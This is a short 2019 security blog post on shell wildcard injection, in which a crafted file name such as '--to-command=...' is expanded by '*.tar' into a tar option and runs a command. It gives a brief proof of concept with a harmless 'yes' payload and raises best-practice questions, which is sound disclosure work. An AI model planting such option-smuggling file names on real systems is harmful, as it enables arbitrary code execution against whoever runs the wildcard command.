Mon Dec 9 15:18:33 EET 2019

Shell wildcards considered dangerous?


Shell wildcards considered dangerous?

Remote version of this affects wu-ftpd from 2003:
https://www.debian.org/security/2003/dsa-377

Summary:  For trusted command PROGRAM, executing
PROGRAM *.EXT
may lead to arbitrary code execution, e.g. for 
PROGRAM=EXT=tar

The main idea is the wildcard to add program options.

Open problem: 

Are popular programs other than tar vulnerable?

Since shell wildcards are unlikely to change, should best practice
include not using *.EXT in shell?


Example exploit vector: starting program in untrusted
directories.

Poc:
====
$rm -rf /tmp/1 ;mkdir /tmp/1 ; cd /tmp/1 ; tar cf a.tar /etc/issue  
$ : >  --to-command="yes .tar"

#end creating, starts PoC
tar xf *.tar

#.tar (repeats)
====

Posted by wild | Permanent link